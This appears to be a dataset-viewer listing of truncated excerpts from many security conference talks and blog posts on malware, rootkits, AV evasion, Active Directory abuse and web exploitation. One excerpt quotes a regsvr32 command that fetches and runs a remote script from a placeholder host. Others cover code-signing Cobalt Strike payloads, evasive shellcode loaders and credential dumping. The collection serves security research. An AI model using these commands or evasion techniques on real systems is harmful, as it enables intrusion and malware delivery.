text
stringlengths
100
9.93M
category
stringclasses
11 values
1 The Tor Project Our mission is to be the global resource for technology, advocacy, research and education in the ongoing pursuit of freedom of speech, privacy rights online, and censorship circumvention. 2 ● Online Anonymity – Open Source – Open Network ● Community of researchers, developers, users and relay ...
pdf
#BHUSA @BlackHatEvents New Memory Forensics Techniques to Defeat Device Monitoring Malware Andrew Case, Gustavo Moreira, Austin Sellers, Golden Richard #BHUSA @BlackHatEvents Information Classification: General Motivation • Malware that is capable of monitoring hardware devices (keyboards, microphones, web cameras, e...
pdf
AirPods客户端异构附件名分析  前⾔  嘶吼发了⼀篇⾏业资讯( https://www.4hou.com/posts/jJAP ),⾥⾯提到AirPods客户端特定附件 名显示不正确问题,攻击者可以让客户端对异常构造的附件名称显示不正确,这种不正确显示会导 致客户端⽤户误打开恶意附件内容。 ⽂中也提到影响版本:AirPods客户端3.0.5以上(含),3.1.0.303(不含)以下版本。 所以我们就根据披露的这点⽂字信息,来分析下该问题吧。 漏洞分析  在下载站找到了⼀个历史版本的安装包(cmclient_3.0.7-155_amd64.exe),安装⼀下即可。 根据已有信息,我们⾸先要明⽩怎样的⽂件名会让⽤户端打开触发,我们...
pdf
Mac OS X Server System Image Administration For Version 10.3 or Later 034-2348_Cvr 9/12/03 10:21 AM Page 1  Apple Computer, Inc. © 2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learning to...
pdf
User Privacy for ISPs and Accidental ISPs For latest version, please see http://www.eff.org/ User Privacy for ISPs and Accidental ISPs. The Digital Millennium Copyright Act gives people who claim to own copyrights tremendous power to invade the privacy of Internet users. With only a clerk’s stamp on a form, almost any...
pdf
中通自动化安全运营 演讲人:中通快递 马 辰 Title :中通安全运营负责人 中通安全运营介绍 中通自动化安全运营 - DevSecOps 中通安全赋能 中通安全运营的未来 目录 中通安全运营介绍 中通安全运营介绍 安全合规 中通安全 安全运营 安全测试 安全开发 安全运维 主动防御型,完成体系 建设后开始搭建安全自 动化平台,安全可视化 后,可以快速准确地感 知安全威胁并进行自动 响应和处理,对安全威 胁主动出击。 安全自动化平台建设 需求驱动型,经历过 不断的救火后,从基 础安全开始重点解决 安全需求中优先级最 高的安全问题。 基础安全建设 主动建设型,完成基 础安全建设后开始建 设完整的安全体系, 主要是为了最大化地 发...
pdf
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Getting the goods with smbexec Eric Milam – Brav0hax Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights R...
pdf
The Darknet of Things Building Sensor Networks to do our bidding. Introductions Anch - anch@subba.net @boneheadsanon Omega - omega@omegacs.net The Internet of Things Things... No, Not your fridge. An Internet of things, not things on the Internet. Sensor Networks What are they What they (are supposed to) do What they a...
pdf
PHISHING WITHOUT FAILURE AND FRUSTRATION or “How I learned to stop worrying and love the layer 8” Unabridged Version Jay Beale CTO, InGuardians 1 Larry Pesce Director of Research, InGuardians """ ▪ As white hats, phishing should be just as easy as for black hats, right? • Write a crafty e-mail that directs readers t...
pdf
某付宝登录js分析 收录于合集 #JS逆向 4个 aHR0cHM6Ly93d3cuYWxpcGF5LmNvbS8= f12 network Ctrl+Shift +F 局搜索需要解密的password关键字 2021-09-18 19:22 原创 不愿透露姓名的热⼼⽹友 ⼀位不愿透露姓名的热⼼⽹友 多次调试后最终在index.js中的393⾏找到getPassword的⽅法,转⽽搜索getPassword声明 位置;在index.js中4979⾏地⽅找到声明信息。 然后下断点,对⽐发包请求内容,发现n的内容password字段信息内容⼀⾄,⽽n是 e.alipayEncrypt(2,i,t)传过来的,所以只需要 由此可得: 1 r...
pdf
________________________________________________________________________ 14 March 2008 Comparison of File Infection on the Windows and Linux Disclaimer: The author of this document is not responsible of any kind of damage that could be made with the bad use of this information. The objective of this paper is for ed...
pdf
Konstantinos Karagiannis CTO, Security Consulting @konstanthacker ethereum is not bitcoin “The key component is this idea of a Turing-complete blockchain” --Vitalik Buterin smart contracts literally a billion reasons 30 million reasons will do caveats solidity dev tools • .sol files > bytecode > blockchain • Atom w...
pdf
在ADCS中,错误配置会导致普通域用户到域管理员的提权。主要体现在证书模板这里,在 证书模板中,我们可以设置应用程序的策略。 我们比较关心的如下: 1 Client Authentication (OID 1.3.6.1.5.5.7.3.2) 2 PKINIT Client Authentication (1.3.6.1.5.2.3.4) 3 Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2) 4 Any Purpose (OID 2.5.29.37.0) 这些可以使得我们拥有请求票据的功能,然后就是SAN的模拟,SAN允许我们使用UPN来 指定用户,来达到用户模拟的目的。 其LDAP查询语句...
pdf
MoreFind ⼀款⽤于快速导出URL、Domain和IP的⼩⼯具 快速安装 ⽅式⼀: 通过Go包管理安装 ⽅式⼆: 直接安装⼆进制⽂件 ⽅式三: 本地编译 ⽤法说明 1)帮助信息 go install github.com/mstxq17/MoreFind@latest wget --no-check-certificate https://ghproxy.com/https://github.com/mstxq17/MoreFind/releases/download/v1.0.2/MoreFi nd_1.0.2_`uname -s`_`uname -m`.tar.gz tar -xzvf MoreFind_1.0.2_...
pdf
A Methodology to Detect and Characterize Kernel Level Rootkit Exploits Involving Redirection of the System Call Table John Levine, Julian Grizzard, Henry Owen School of Electrical and Computer Engineering Georgia Institute of Technology E-mail: levine@ece.gatech.edu Abstract There is no standardized methodology...
pdf
Project “The Interceptor” Avoiding counter-drone systems with nanodrones David Melendez Cano R&D Embedded Software Engineer Introduction With massive drone industry growth, comes antidrone systems industry. Due to multiple and even classic vulnerabilities of communications now used by drones, antidrone industry can ta...
pdf
Cryptanalysis in real life II 研究團隊 王昶凱 邱弈豪 周立平 鄭振牟 演講者 周立平 1 Total page : 46 綱要 1. Mifare Classic(Crypto1)與Hitag2的介紹 YoYo card in Taipei 2. 攻擊手法和結果概述 3. Extra: Non-NIST ciphers 4. Q&A 2 Crypto1與Hitag2的介紹 NXP 公司所發售的產品 (Mifare Series & hitag2) Mifare Classic 系列的智慧卡使用 Crypto1,已售5000萬個MIFARE讀卡機, 50億個tag,使用範圍相當廣泛(地鐵等...
pdf
#BHUSA @BlackHatEvents UWB Real Time Locating Systems Andrea Palanca Luca Cremona Roya Gordon labs@nozominetworks.com How Secure Radio Communications May Fail in Practice © 2022 Nozomi Networks Inc. 2 Overview 01 02 03 04 Methodology of Research Attack Demos Remediations 05 Summary & Key Takeaways Introduction Intro...
pdf
Adventures in MitM-land Using MITM to Attack Active Directory Authentication Schemes About Us • Senior Engineer @CrowdStrike (Former @Preempt) • Extensive background as a security researcher Sagi Sheinfeld (@sagish1233) • Senior Engineer @CrowdStrike (Former @Preempt) • Previously presented on Black Hat Eyal Karni (@ey...
pdf
Hacking Driverless Vehicles Zoz Origins Germany 1986 Ernst Dickmanns, VaMoRs 1995: Munich to Copenhagen in regular traffc, up to 175kph, vision only! Asia • Singapore: Autonomous bus services scheduled by 2022 • Shanghai: Autonomous bus testing • Guangzhou: Public road testing since 2018 • Beijing: Baidu testing on 105...
pdf
HORNECYBER.COM SECURE PENETRATION TESTING OPERATIONS: DEMONSTRATED WEAKNESSES IN LEARNING MATERIAL AND TOOLS PRE-PUBLICATION VERSION FOR CONFERENCE RELEASE | FOR THE FINAL REPORT, INCLUDING CODE AND DETAILED DESCRIPTION OF THE DEMONSTRATED TOOL, VISIT HORNECYBER.COM ABSTRACT Following previous presentations on the...
pdf
你怎么知道Wappalyzer是不是在骗你? Wappalyzer插件检测原理 插件是开源的 https://github.com/wappalyzer/wappalyzer readme中提到会收集cookie,dom,js,css,header等数据,通过既定规则匹配,实现获取信息并匹 配版本 其中js和dom比较特别,这里以js为例分析 https://github.com/wappalyzer/wappalyzer/blob/v6.10.18/src/drivers/webextension/js/content.js #L36-L42 会插入一个 js/js.js 到前端去执行 https://github.com/wap...
pdf
©  2012  The  MITRE  Corpora2on.  All  rights  reserved. No  More  Hooks: Trustworthy  Detec2on  of Code  Integrity  AGacks Xeno  Kovah,  Corey  Kallenberg, Chris  Weathers,  Amy  Herzog, MaGhew  Albin,  John  BuGerworth © 2012 The MITRE Corporation. All rights reserve...
pdf
Copyright© 2003 Avaya Inc. All rights reserved Avaya - Proprietary (Restricted) Solely for authorized persons having a need to know pursuant to Company instructions Stack Black Ops Black Hat USA 2003 New Concepts for Network Manipulation Dan Kaminsky, CISSP Copyright© 2003 Avaya Inc. All rights reserved 2 Avaya - Pr...
pdf
 Goto Payload for Windows  DLL, compiled C  Usually injected into process memory  Enhanced CMD shell  Provides basic post- exploitation API  Often run with SYSTEM Privs  Can be migrated into a user’s process  Railgun is an extension to the Meterpreter STDAPI  Allows Arbitrary Loading of DLLs  A...
pdf
Warping Reality Creating and countering the next generation of Linux rootkits using eBPF Pat Hogan @PathToFile Overview ● What are Linux kernel rootkits ● Why writing and using rootkits is hard ● How eBPF solves these problems and more ● How to detect and prevent malicious eBPF usage @pathtofile What are kernel rootki...
pdf
DEFCON 22 Joe FitzPatrick Miles Crabill Stupid PCIe Tricks featuring NSA Playset: PCIe ●  Electrical Engineering education with focus on CS and Infosec ●  8 years doing security research, speed debug, and tool development for CPUs ●  Hardware Pen Testing of CPUs ●  Security training for functional validat...
pdf
Phantom Attack: Evading System Call Monitoring Rex Guo, Ph.D. Junyuan Zeng, Ph.D. @Xiaofei_Rex jzeng04 *NOSPAM* gmail DOT com web app RCE on joe-box and executed a reverse shell An Incident - An Attacker’s View web app RCE on joe-box and executed a reverse shell An Incident - An Attacker’s View Privilege escala...
pdf
笔记本: 企业安全建设 创建时间: 2022/10/2 10:51 更新时间: 2022/10/2 13:31 作者: Aim High URL: https://www.cnblogs.com/xinxin999/p/15874533.html regsvr32 && rundll32的研究 一.前言 关于在终端对抗上,regsvr32 && rundll32师傅们常用的2种方式 regsvr32 /s /u /i:http://xx.xx.xx.xx:6007/test.sct scrobj.dll //执行恶意sct文件 rundll32 cs.dll start ...
pdf
Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 Automating Vulnerability Assessments with Vuls Kota KANBE & Teppei FUKUDA HITCON CMT 2017 2 Automating Vulnerability Assessments with Vuls | HITCON CMT 2017 Vuls open-source, agent-less vulnerability scanner
 (based on information from NVD, OVAL, etc.) Ma...
pdf
KCon KCon 智能门锁的“天灾人祸” Bluetooth smart locks安全攻防研究 关于作者 • 启明星辰ADlab安全研究员 • 研究方向:智能设备安全研究与漏洞挖掘 • 邮箱:butterflyhuangxx@gmail.com • 看雪ID:ID蝴蝶 PART 01 浅谈蓝牙低能耗 PART 02 智能门锁的安全问题 PART 03 研究案例分享 PART 04 改进方案 PART 05 写在最后 目录 CONTENTS 01 浅谈蓝牙低能耗 蓝牙低能耗应用场景 蓝牙低能耗特点 • 低能耗,可变连接时间 • 传输距离远 • 采用128bitAES加密 • 低延时 蓝牙低能耗协议栈 • 蓝牙应用层 • Host层...
pdf
Beyond Security Put something on the internet - Get hacked 1 Beyond Security Agenda • About me • IoT • IoT core problems • Software • Hardware • Vulnerabilities • What should I do? Beyond Security • Been interested in the field of security since childhood • Doing network analysis, forensics, dark web ...
pdf
JVM类加载器与双亲委派 学习视频:学习视频 类的生命周期 一个类从加载到jvm内存,到从jvm内存卸载,生命周期可分为七个阶段。 1. 加载(Loading):classpath,jar包,网络,磁盘位置下的类的class以二进制字节流读进来,在内存 中生成一个代表这个类的Class类对象放入元空间。可以自定义类加载器。 2. 验证(Verification):验证Class文件的字节流中包含的信息是否符合java虚拟机规范 3. 准备(Preparation):类变量赋默认初始值 4. 解析(Resolution):把符合引用翻译为直接引用 5. 初始化(Initialization) 6. 使用(Using) 7. 卸载(Un...
pdf
802.11 Massive Monitoring Andrés Blanco - Andrés Gazzoli Outline • Introduction • Approaches • The USB Dilemma • Distributed System • WiWo • Questions Introduction [ Who is this talk for? ] Introduction [ Who is this talk for? ] Introduction [ Who is this talk for? ] Introduction [ Who is this talk for? ] ...
pdf
One bite and all your dreams will come true: Analyzing and Attacking Apple Kernel Drivers X(aolon& Ba( & M(n Spar)) Zhen& 1 Xiaolong Bai Alibaba Security Engineer  Ph.D. graduated from Tsinghua University Published papers on the top 4: S&P, Usenix Security, CCS, NDSS Twitter, Weibo, Github: bxl1989 Min (Spark) Zhe...
pdf
Observed Answers Record Type Usage Sources Ports _afpovertcp._tcp.local PTR Hosts (Apple) N/A _axis-video._tcp.local PTR Cameras (Axis) N/A _blackarmor4dconfig._tcp.local PTR Network Attached Storage (Seagate) N/A _blackarmor4dinfo._udp.local PTR Network Attached Storage (Seagate) N/A _ftp._tcp.local PTR Printers (HP) ...
pdf
How I Learned to Stop Fuzzing and Find More Bugs Jacob West Fortify Software August 3-5, 2007 Las Vegas Agenda Introduction to fuzzing What we mean by fuzzing Challenges with fuzzing Introduction to static analysis How static analysis works Examples of bugs static analysis is good at finding Untapped potential: Cust...
pdf
2022/3/28 10:36 PHP filter_var 恶作剧 :: pwning.systems https://pwning.systems/posts/php_filter_var_shenanigans/ 1/7 222326 乔迪·佐默 很可能我们都⻅过可以防⽌我们遇到漏洞的 PHP 过滤器。在这篇博⽂中,我将通过在过滤器本 身中查找错误以找到错误来引导您完成绕过过滤器的思考过程! 假设我们有以下代码,它将⼀些⽤户输⼊传递给 filter_var() 并使⽤ FILTER_VALIDATE_DOMAIN or FILTER FLAG HOSTNAME 标志。这增加了根据每个主机原理 验证主机名的功能(这意味着它们必须以...
pdf
001 Speaker@YongShao • • • • Whoami Oauth2.0 • • • ()! • • • Web https://facebook.com/dialog/oa uth?response_type=code&clien t_id=CLIENT_ID&redirect_uri=R EDIRECT_URI&scope=email&sta te=1234zyx • • https://open.weixin.qq.com/connect/oauth 2/authorize?appid=wxc43*******&respon se_type=code&scope=snsapi_...
pdf
1 精简JRE打造⽆依赖的Java-ShellCode-Loader 前⾔ jre⽬录结构 lib⽬录 bin⽬录 精简rt.jar 精简dll ⾃解压捆绑执⾏ EnigmaVirtualBox打包全部⽂件 EnigmaVirtualBox打包jre 最后 @yzddMr6 利⽤⼩众语⾔进⾏免杀⼀直是⼀个屡试不爽的⽅法,从python到go再到现在的nim免杀,⽤的⼈越 多杀软的检测也就越来越严格。现在⾃⼰写的go程序基本只要涉及到⽹络通信360就⼲掉了。那么还有没 有什么新的姿势呢? 之前介绍过在As-Exploits中⽤到的基于JNA实现的 ShellCodeLoader(https://t.zsxq.com/022FQrFA...
pdf
apk-message 0x00 appandroidmessage 0x01 message message messagedemo appA Bandroid 1. message Message message= new Message() Message message= Message.obtain() Messager message= handler.obtaionMessager() obtain 2. Message message = Message.obtain(); // message.what = 0; //whatmessage code message.arg1 = 1; //int ...
pdf
重装上阵:Office攻击来袭 朱季峰 杨军锋 议程: • ⼀一 2017年年Office威胁分析与回顾 • ⼆二 如何建⽴立终端Office威胁防护机制 • 三 2017年年Office ITW 0day原因分析 • 四 关于2018年年Office威胁趋势的预测 2017年年Office威胁分析与回顾 • Case study 1:定向攻击中使⽤用Office作为攻击武器器 • 样本⾸首现时间:2016-12-26 • 攻击跨度时间:2016-12-27 ~ 2017-02 • 事件背景:北北约-俄罗斯理理事会举⾏行行年年内第三次⼤大使级会议,2016-12-19⽇日 • 攻击事件信息披露露:《Matryoshka Doll R...
pdf
Stamp Out Hash Corruption,  Crack All the Things!  RyanReynolds,Manager,CroweHorwath,LLP JonathanClaudius,SpiderLabsSecurityResearcher,Trustwave July2012 Abstract  ThiswhitepaperistoserveasasupportingreferencetotheDEFCON20talk,“Stamp OutHashCorruption,CrackAlltheThings!”.Thefocusofboththepaperand presentationistoshowho...
pdf
前言 Coherence 组件是 WebLogic 中的一个核心组件,内置在 WebLogic 中。关于 Coherence 组件的官方 介绍:https://www.oracle.com/cn/java/coherence/ 近些年,weblogic Coherence 组件反序列化漏洞被频繁爆出,苦于网上没有公开对 weblogic Coherence 组件历史反序列化漏洞的总结,导致很多想入门或者了解 weblogic Coherence 组件反序列 化漏洞的朋友不知道该怎么下手,于是本文便对 weblogic Coherence 组件历史反序列化漏洞做出了一 个总结和分析。 关于 Coherence 组件反序列化漏洞利用...
pdf
Hacking Windows CE san@nsfocus.com san@xfocus.org Structure Overview • Windows CE Overview • Windows CE Memory Management • Windows CE Processes and Threads • Windows CE API Address Search Technology • The Shellcode for Windows CE • Windows CE Buffer Overflow Demonstration • About Decoding Shellcode • Conclusion • Refe...
pdf
逃离安卓动态检测 目录 • 沙盒检测 • 延时触发 • Taintdroid与反隐私检测 • 自校验与SmaliHook • 条件触发 • 公开沙盒与私有沙盒 沙盒检测 • 通过手机号码来检测 沙盒检测 • 通过NetworkOperator名检测 沙盒检测 • 通过设备ID检测 沙盒检测 • 通过语言信箱号码检测 沙盒检测 • 通过ROM编译文件build.prop的信息检测 沙盒检测 • 通过模拟器没有WIFI支持这个特性来检测 沙盒检测 • 特定沙盒的检测 • 写嗅探程序上传到在线分析网站 • 获取对应的信息(例如手机号) • 判断该信息是否为特定沙盒独有的 沙箱的环境特征 • bouncer • anubis 检测QEMU ...
pdf
通过gitlab RCE后,可以拿数据库密码,⽬录⼀般在gitlab config/database.yml⽂件中 先获取root的密⽂,弄完还原回去 cat config/database.yml # # PRODUCTION # production: adapter: postgresql encoding: unicode database: gitlabhq_production host: postgresql port: 5432 username: gitlab password: "password" pool: 10 prepared_statements: true sele...
pdf
测试环境安装了bitdefender,方便查看Hook情况,使用x64debug进行进程调试,运行notepad 进程,然后使用x64debug附加到进程,x64debug中断 在Symbols标签搜索Token类函数可以看到与Token类相关的函数。 我们选择NtAdjustGroupsToken,双击,便可以进入到该函数的调用流程 也就是我们常见的形式: 但如果我们选择NtAdjustPrivilegeToken: 可以看到直接进入了一个jmp的跳转。我们跟进去: mov r10,rcx 1 mov eax,xx 2 syscall 3 里面是一些mov语句然后push rax,然后ret执行,我们可以使用Ctrl+G进跟踪 跟...
pdf
Secure&Because&Math:&A&Deep1Dive&on& Machine&Learning1Based&Monitoring& (#SecureBecauseMath)& Alex%Pinto% Chief%Data%Scien2st%|%MLSec%Project%% @alexcpsec% @MLSecProject! Alex%Pinto% •  Chief%Data%Scien2st%at%MLSec%Project% •  Machine%Learning%Researcher%and%Trainer% •  Network%security%and%incident%response%aficionado%...
pdf
DNS - Devious Name Services Destroying Privacy & Anonymity Without Your Consent Jim Nitterauer Senior Security Specialist Disclaimer Information disclosed in this presentation is intended to help improve your security & privacy posture and should not be used for unethical purposes The concepts presented are in no ...
pdf
第 1页 共 12页 SDL-软件安全设计初窥 — safer applications begin with secure design — Cryin@insight-labs.org 摘要:本文详细介绍微软软件安全开发生命周期(SDL)相关概念,并讨论要遵循 SDL 过 程所应执行的各种安全活动,其中着重对软件安全设计的原则进行探讨。并对 STRIDE 威胁 建模方法进行深入介绍。 安全开发生命周期(SDL)是一个帮助开发人员构建更安全的软件和解决安全合规要求 的同时降低开发成本的软件开发过程。 安全应用从安全设计开始,软件的安全问题很大一 部分是由于不安全的设计而引入的,微软用多年的经验总结出了安全开发生命周期(SDL), ...
pdf
Tencent Blade Team 公有云SDN的安全风险与加固 演讲人:杨韬 2019 About Me • 安全平台部高级工程师 • Tencent Blade Team • 安全预研,SDN、BIOS、TEE About Tencent Blade Team 受邀参加Blackhat USA、DEFCON、HITB、 CanSecWest、CSS、KCon、XCon等多个海内外 顶级安全会议 多次受邀参加 海内外顶级安全会议 Amazon、小米、华为等多个品牌官方认可, 获小米安全年度最佳守护者,荣获华为漏洞 奖励计划官方认可 获Amazon、小米、华 为等多个品牌官方认可 为腾讯Tday、腾讯首...
pdf
Mac OS X Server Open Directory Administration For Version 10.3 or Later 034-2352_Cvr 9/12/03 10:29 AM Page 1  Apple Computer, Inc. © 2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learning ...
pdf
怎样用 Cobalt Strike 生成具有代码签名的 payload ——— By Digg3r 转换证书格式和转换过程中遇到的坑 可以看 CS 官方文档或者作者的 youtube 视频,profile 中配置签名是 jks 格式,而 windows 是 pfx 结尾的默认是 pkcs12 格式,所以需要转换成 JAVA 的 jks 格式, 一个 profile 代码签名的配置示例如下: code-signer { set keystore "codesign.jks"; set password "123456"; set alias "server"; } 不想配置 porfile 也可以不转换,因为有点小麻烦,完全可以在生成...
pdf
SENSEPOST Demystifying+Windows+Kernel+Exploitation+by+Abusing+GDI+ Objects. Saif El-Sherei SENSEPOST #Whoami SENSEPOST Why? SENSEPOST What? SENSEPOST • Abusing two types of GDI Objects, to gain ring0 exploit primitives. • Analysing two+N-Days+(MS16-098,+MS17- 017??),+by+using+these+techniques. SENSEPOST Introduction h...
pdf
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! Orange Tsai Taiwan No.1 About Orange Tsai The most professional red team in Taiwan About Orange Tsai The largest hacker conference in Taiwan founded by chrO.ot About Orange Tsai Speaker - Speaker at several security conferences HITCON, WooYun...
pdf
Stalking a City for Fun and Frivolity “Pull pin, point toward privacy insurance claimant” Brendan O’Connor Malice Afterthought, Inc. http://www.maliceafterthought.com Everything leaks too much data. At every level, we’ve forgotten that privacy, not just security, should be a goal. It is no longer possible to “blend...
pdf
S-behinder源码学习 PHP类型 入口 net.rebeyond.behinder.ui.controller.MainController.java openshell() 打开一个shell,会创建一个新的线程去管理这个shell,下一步是进入到新的线程当 中 mainWindowController net.rebeyond.behinder.ui.controller.MainWindowController.java 这里就是获取一个正常shell的连接,重要的是执行这个 this.doConnect() 方法。而这个方法最 后指向的是 this.currentShellService.doConnect(...
pdf
王大寶, PK 虛擬機 - 惡意程式攻防的新戰場  講師簡介 王大寶, 小時候大家叫他王小寶,長大後就稱王大寶,目前隸 屬一神祕單位. 雖然佯稱興趣在看書與聽音樂, 但是其實晚 上都在打Game. 長期於系統最底層打滾,熟悉ASM,C/C++, 對於資安毫無任何興趣,也無經驗,純粹是被某壞人騙上台, 可以說是不可多得的素人講師!!  議程大綱: 現今的 CPU 都支援虛擬化專用指令集, 讓 VM 獲得硬體的 支援. 在這個場次中,我們將詳細地介紹 Intel 的 VT指令集 與其 Hypervisor 運作的機制. 此外我們將並介紹在惡意軟 體研究領域中在 Hypervisor 模式下能有哪些應用,包含惡意 程式技術與偵防分...
pdf
PEB、TEB详解 PEB PEB中文名为进程环境块,里面存储了像映像加载程序、堆管理器以及其他windows组件需要从用户 模式访问的信息。在介绍PEB之前我们先来看一下进程内部的结构,以此来更好的了解PEB。 每个windows进程都可以用一种执行体进程(EPROCESS)进程来表示。EPROCESS及其大部分相关数据 结构都位于系统地址空间中。唯一的例外就是PEB,它位于用户地址空间中。对于每个执行了的 windows程序的进程,windows子系统进程(Csrss)维护了名为CSR_PROCESS的平行结构,另外 windows子系统(win32k.sys)的内核模式部分还为每个进程维护了名为W32PROCESS的数据结...
pdf
Defeating static signatures in blackbox antivirus engines Insomni’hack 2022 Vladimir Meier # whoami #Security researcher @ SCRT #Working on antivirus software since 2015 #Author of https://github.com/scrt/avcleaner #https://blog.scrt.ch «Antivirus Bypass» category 1 / 52 Contents #Demo #13 reasons why antivirus bypas...
pdf
Transparent Malware Debugging on x86 and ARM Zhenyu Ning and Fengwei Zhang COMPASS Lab Wayne State University April 27, 2018 1 Outline I Introduction I Background I Towards Transparent Malware Analysis I MalT on x86 Architecture I Ninja on ARM Architecture I Conclusions 2 Outline I Introduction I Background I Towards T...
pdf
A"GTVHACKER"PRODUCTION" GTVHACKER"PRESENTS: GTVHacker" •  Formed'to'root'the'original' Google'TV'in'2010' •  Released'exploits'for'every' Google'TV'device' •  Plus'some'others:' Chromecast,'Roku,'Nest' •  Many'more'to'come!'' Speaking"Members" Amir"Etemadieh"(@Zenofex)"–'Research'ScienHst'at'Accuvant' LABS,'founded'GTV...
pdf
Protecting your IT infrastructure from Legal attacks: Subpoenas, Warrants and Transitive Attacks Alexander Muentz, Esq. Defcon 15 Disclaimer • I am a lawyer, but not your lawyer • The topics presented reflect my personal views and are not necessarily those of ONSITE3 • This talk is not legal advice, but for educationa...
pdf
1 10.10.6.188后台模版注⼊getshell-z3r0ne 10.10.6.188 群⾥的师⽗z3r0ne师傅 跑出的admin/admin 后台模版getshell 这⾥抓取密码的时候其实有很多同学会喜欢⽤mimi直接抓hashdump和logpasswords 却忽略了 cached domain logon ⽐如这⾥就抓到了历史域管⽤户登陆虽然密码不对 抓到域⽤户shirts\ehahn的密码 尝试查看当前域⽤户的sid和当前⽤户登陆的机器 以及获取域机器和 ms-ds-creatorsid⽤来寻找ehahn能完全控制的主机,结果没得这⾥也可以⽤ adfind收集当前域⽤户信息和域全部电脑信息 1 beacon> sh...
pdf
0x00 起因 原本不想炒冷饭的,有一天看到师傅们再说IDEA里面Debug获取的时候会默认调用ToString 方法,然后就去google了一下相关的后反序列化知识,因为提前跑路却沦落在家隔离没事可做 就多搜索了一点,感觉Dubbo的三个洞还是蛮有代表性的,就调试分析学习下。 漏洞列表: CVE-2019-17564 CVE-2020-1948 CVE-2021-25641 0x01 Dubbo介绍 Apache Dubbo 是一款高性能Java RPC框架。漏洞存在于 Apache Dubbo默认使用的反序列 化工具 hessian 中,攻击者可能会通过发送恶意 RPC 请求来触发漏洞,这类 RPC 请求中通常 会带有无法识别的...
pdf
SCOTT MOULTON’S SPEECH RESEARCH MATERIAL AND NOTES ON DATA RECOVERY www.ForensicStrategy.com|www.MyHardDriveDied.com Copyright © June 2007 by Scott A. Moulton @ Forensic Strategy Services, LLC. All rights reserved. Data Recovery Whitepaper – Rev 17 ...
pdf
1 spring beans RCE Spring MVC 框架的参数绑定功能提供了将请求中的参数绑定控制器⽅法中参数对象的成员变量,攻击 者通过构造恶意请求获取AccessLogValve 对象并注⼊恶意字段值触发 pipeline 机制可写⼊任意路径下 的⽂件。 简答来说就是参数绑定造成的变量覆盖漏洞,漏洞点spring-beans包中。 ⽆ JDK>=9 springMVC 全版本 根据之前的漏洞分析 http://rui0.cn/archives/1158,其中⼀个点在于获取BeanInfo,位置在CachedIntrospectionResults 构造⽅法,下个断点,发送请求断下 漏洞介绍 漏洞编号 影...
pdf
Network Nightmare Ruling the nightlife between shutdown and boot with pxesploit #whoami • Matt Weeks • Scriptjunkie if you hang out on irc • I have a twitter but I don’t use it • http://www.scriptjunkie.us/ • scriptjunkie {shift+2} scriptjunkie.us What’s going on here • Want to compromise another system on t...
pdf
w waarrddrriivviinngg tthhee ssm maarrtt ggrriidd :::: pprraaccttiiccaall aapppprrooaacchheess ttoo aattttaacckkiinngg uuttiilliittyy ppaacckkeett rraaddiiooss :::: sshhaawwnn m mooyyeerr aanndd nnaatthhaann kkeellttnneerr D DeeffC Coonn 0000001100001100 DEF CON 00010010 Moyer / Keltner :: Wardriv...
pdf
Gone in 60 Minutes: Stealing Sensitive Data from Thousands of Systems Simultaneously with OpenDLP Andrew Gavin Verizon Business Standard Disclaimer • I am representing myself, not my employer, with OpenDLP and this talk • If you get in trouble for using OpenDLP, it is your fault and not mine is your fault and not m...
pdf
Information Security Partners, LLC iSECPartners.com Attacking Web Services Alex Stamos alex@isecpartners.com Defcon XIII Scott Stender scott@isecpartners.com www.isecpartners.com Information Security Partners, LLC 2 Introduction • Who are we? – Founding Partners of Information Security Partners, LLC (iSEC Partners) – A...
pdf
N1CTF2020 Writeup Author:Nu1L Team WEB signin GinDriver Design Information Gathering Webauthn Reverse Engineering Identity Forgery Arbitrary File Uploading Arbitrary File Reading Get Shell Easy_tp5 Expected solution Unexpected 1 Unexpected 2 Unexpected 3 Unexpected 4 It's half expected 5 Zabbix_fun Docker_manager The K...
pdf
Canaan Kao, Chuang Wang, I-Ju Liao canaan@totoro.cs.nthu.edu.tw canaan_kao@trend.com.tw SOME THINGS BEFORE NETWORK ATTACK (A LONG TIME OBSERVATION) 網路攻擊之前的二三事 AGENDA • The Motivation • Port Scan 101 • IDS/IDP-based Port Scan Detection • Honeypot-based Port Scan Detection • Play with SDN switch • A Long Time Observation...
pdf
The Neuronumerous Group Presents: Build a Lie Detector / Beat a Lie Detector With your hosts Rain And J03b34r Introduction by: Int80 Start to Finish ● History of Deception Detection ● The History of the Polygraph ● How We Built our DIY Polygraph ● Trying to Beat the DIY Polygraph ● The Data Aftermath History of Decep...
pdf
Digital Leviathan Nation-State Big Brothers (from huge to little ones) Eduardo Izycki & Rodrigo Colli Las Vegas, August 11th 2018 AGENDA INTRO SOURCES OUTCOMES CONCLUSION INTRO INTRO “We should give our obedience to an unaccountable sovereign otherwise what awaits us is a ‘state of nature’ that closely resembles civ...
pdf
Jon McCoy www.DigitalBodyGuard.com Hacking.NET Applications: The Black Arts Why .NET Countermeasures Skill Level Needed Will this work on every .NET application BACKGROUND How-To Attack .NET Applications Tools and Methodology of Attacking Overcome “secure” .NET Applications Building KeyGen/Crack/Hacks/Malware Reverse...
pdf
1 Advanced MySQL Exploitation Muhaimin Dzulfakar muhaimindz@gmail.com 2 Contents 1 Abstract............................................................................................................................................3 2 Introduction ..........................................................................
pdf
Bypassing pre-b o ot authen tication passw ords b y instrumen ting the BIOS k eyb oard buer (practical lo w lev el attac ks against x86 pre-b o ot authen tication soft w are) Jonathan Brossard - jonathan@ivizindia.com Iviz T ec hnosolutions Pvt. Ltd. , K olk ata, India The wal ls b etwe en art and engine ering exist on...
pdf
The Information Security Experts Copyright © 2008 SecureWorks, Inc. All rights reserved. Snort Plug-in Development: Teaching an Old Pig New Tricks Ben Feinstein, CISSP GCFA SecureWorks Counter Threat Unit™ DEFCON 16 August 8, 2008 The Information Security Experts Copyright © 2008 SecureWorks, Inc. All rights reserved. ...
pdf
